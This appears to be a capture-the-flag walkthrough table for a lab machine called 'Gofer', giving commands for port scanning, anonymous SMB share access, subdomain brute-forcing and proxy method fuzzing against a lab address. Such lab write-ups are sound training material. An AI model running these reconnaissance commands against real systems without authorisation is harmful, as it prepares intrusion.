| ### Gofer | id | stage | techniques | command | | -- | --------------- | -------------------------------- | ------------------------------------------------------------------------------- | | 1 | Recon | Scanning with nmap | `nmap -p- --min-rate 10000 10.10.11.225` | | 2 | SMB Enumeration | Enumerate shares with netexec | `netexec smb 10.10.11.225 --shares` | | 3 | SMB Access | Access SMB share with smbclient | `smbclient //10.10.11.225/shares -N` | | 4 | Email Analysis | Analyze backup email | `cat mail` (after retrieving the file) | | 5 | Subdomain Enum | Brute force subdomains with ffuf | `ffuf -u http://10.10.11.225 -H "Host: FUZZ.gofer.htb" -w wordlist -mc all -ac` | | 6 | Proxy Access | Fuzzing HTTP methods on proxy | `feroxbuster -u http://proxy.gofer.htb -m GET,POST,PUT,OPTIONS,CONNECT -x php` |